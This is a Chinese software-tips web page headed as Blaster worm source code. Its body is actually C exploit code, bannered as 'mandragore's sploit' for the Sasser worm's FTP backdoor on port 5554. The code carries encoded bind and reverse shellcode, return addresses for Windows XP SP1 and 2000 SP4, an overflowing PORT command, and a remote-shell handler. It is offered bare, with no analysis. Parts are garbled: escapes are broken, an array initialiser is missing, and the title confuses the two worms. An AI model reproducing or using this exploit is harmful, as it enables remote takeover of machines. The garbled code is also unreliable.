您现在的位置是:首页» windows系统» 冲击波病毒源码,冲击波病毒入侵视频

冲击波病毒源码,冲击波病毒入侵视频

2024-07-13 04:29:15
本内容由系统网小编为大家分享,Windows系统安装教程、办公系统、软件怎么使用、软件使用教程、办公软件攻略等信息。#include #include #include #incl

本内容由系统网小编为大家分享,Windows系统安装教程、办公系统、软件怎么使用、软件使用教程、办公软件攻略等信息。

#include <stdio.h>#include <strings.h>#include <signal.h>#include <netinet/in.h>#include <netdb.h>#define NORM "/033[00;00m"#define GREEN "/033[01;32m"#define YELL "/033[01;33m"#define RED "/033[01;31m"#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.3 for " RED "sasser.x" NORM#define fatal(x) { perror(x); exit(1); }#define default_port 5554struct { char *os; long goreg; long gpa; long lla;}targets[] = {// { "os", go ebx or pop pop ret, GetProcAd ptr, LoadLib ptr },{ "wXP SP1 all", 0x77C0BF21, 0x77be10CC, 0x77be10D0 },{ "w2k SP4 all", 0x7801D081, 0x780320cc, 0x780320d0 },}, tsz;unsigned char bsh[]={0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E};unsigned char rsh[]={0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E};char verbose=0;void setoff(long GPA, long LLA) {int gpa=GPA^0xdededede, lla=LLA^0xdededede;memcpy(bsh+0x1d,&gpa,4);memcpy(bsh+0x2e,&lla,4);memcpy(rsh+0x1d,&gpa,4);memcpy(rsh+0x2e,&lla,4);}void usage(char *argv0) {int i;printf("%s -d <host/ip> [opts]/n/n",argv0);printf("Options:/n");printf(" -h undocumented/n");printf(" -p <port> to connect to [default: %u]/n",default_port);printf(" -s <'bind'/'rev'> shellcode type [default: bind]/n");printf(" -P <port> for the shellcode [default: 530]/n");printf(" -H <host/ip> for the reverse shellcode/n");printf(" -L setup the listener for the reverse shell/n");printf(" -t <target type> [default 0]; choose below/n/n");printf("Types:/n");for(i = 0; i < sizeof(targets)/sizeof(tsz); i++)printf(" %d %s/t[0x%.8x]/n", i, targets[i].os, targets[i].goreg);exit(1);}void shell(int s) {char buff[4096];int retval;fd_set fds;printf("[+] connected!/n/n");for (;;) {FD_ZERO(&fds);FD_SET(0,&fds);FD_SET(s,&fds);if (select(s+1, &fds, NULL, NULL, NULL) < 0)fatal("[-] shell.select()");if (FD_ISSET(0,&fds)) {if ((retval = read(1,buff,4096)) < 1)fatal("[-] shell.recv(stdin)");send(s,buff,retval,0);}if (FD_ISSET(s,&fds)) {if ((retval = recv(s,buff,4096,0)) < 1)fatal("[-] shell.recv(socket)");write(1,buff,retval);}}}void callback(short port) {struct sockaddr_in sin;int s,slen=16;sin.sin_family = 2;sin.sin_addr.s_addr = 0;sin.sin_port = htons(port);s=socket(2,1,6);if ( bind(s,(struct sockaddr *)&sin, 16) ) {kill(getppid(),SIGKILL);fatal("[-] shell.bind");}listen(s,1);s=accept(s,(struct sockaddr *)&sin,&slen);shell(s);printf("crap/n");}int main(int argc, char **argv, char **env) {struct sockaddr_in sin;struct hostent *he;char *host; int port=default_port;char *Host; int Port=5300; char bindopt=1;int i,s,pid=0,rip;char *buff;int type=0;char *jmp[]=;printf(BANNER "/n");if (argc==1)usage(argv[0]);for (i=1;i<argc;i+=2) {if (strlen(argv[i]) != 2)usage(argv[0]);switch(argv[i][1]) {case 't':type=atoi(argv[i+1]);break;case 'd':host=argv[i+1];break;case 'p':port=atoi(argv[i+1])?:default_port;break;case 's':if (strstr(argv[i+1],"rev"))bindopt=0;break;case 'H':Host=argv[i+1];break;case 'P':Port=atoi(argv[i+1])?:5300;Port=Port ^ 0xdede;Port=(Port & 0xff) << 8 | Port >>8;memcpy(bsh+0x57,&Port,2);memcpy(rsh+0x5a,&Port,2);Port=Port ^ 0xdede;Port=(Port & 0xff) << 8 | Port >>8;break;case 'L':pid++; i--;break;case 'v':verbose++; i--;break;case 'h':usage(argv[0]);default:usage(argv[0]);}}if (verbose)printf("verbose!/n");if ((he=gethostbyname(host))==NULL)fatal("[-] gethostbyname()");sin.sin_family = 2;sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);sin.sin_port = htons(port);printf("[.] launching attack on %s:%d../n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);if (bindopt)printf("[.] will try to put a bindshell on port %d./n",Port);else {if ((he=gethostbyname(Host))==NULL)fatal("[-] gethostbyname() for -H");rip=*((long *)he->h_addr_list[0]);rip=rip^0xdededede;memcpy(rsh+0x53,&rip,4);if (pid) {printf("[.] setting up a listener on port %d./n",Port);pid=fork();switch (pid) { case 0: callback(Port); }} elseprintf("[.] you should have a listener on %s:%d./n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),Port);}printf("[.] using type '%s'/n",targets[type].os);// -------------------- cores=socket(2,1,6);if (connect(s,(struct sockaddr *)&sin,16)!=0) {if (pid) kill(pid,SIGKILL);fatal("[-] connect()");}printf("[+] connected, sending exploit/n");buff=(char *)malloc(4096);bzero(buff,4096);sprintf(buff,"USER x/n");send(s,buff,strlen(buff),0);recv(s,buff,4095,0);sprintf(buff,"PASS x/n");send(s,buff,strlen(buff),0);recv(s,buff,4095,0);memset(buff+0000,0x90,2000);strncpy(buff,"PORT ",5);strcat(buff,"/x0a");memcpy(buff+272,jmp[0],2);memcpy(buff+276,&targets[type].goreg,4);memcpy(buff+280,jmp[1],5);setoff(targets[type].gpa, targets[type].lla);if (bindopt)memcpy(buff+300,&bsh,strlen(bsh));elsememcpy(buff+300,&rsh,strlen(rsh));send(s,buff,strlen(buff),0);free(buff);close(s);// -------------------- end of coreif (bindopt) {sin.sin_port = htons(Port);sleep(1);s=socket(2,1,6);if (connect(s,(struct sockaddr *)&sin,16)!=0)fatal("[-] exploit most likely failed");shell(s);}if (pid) wait(&pid);exit(0);}

XTw.com.Cn系统网专业应用软件下载教程,免费windows10系统,win11,办公软件,OA办公系统,OA软件,办公自动化软件,开源系统,移动办公软件等信息,解决一体化的办公方案。

免责声明:本文中引用的各种信息及资料(包括但不限于文字、数据、图表及超链接等)均来源于该信息及资料的相关主体(包括但不限于公司、媒体、协会等机构)的官方网站或公开发表的信息。内容仅供参考使用,不准确地方联系删除处理!

联系邮箱:773537036@qq.com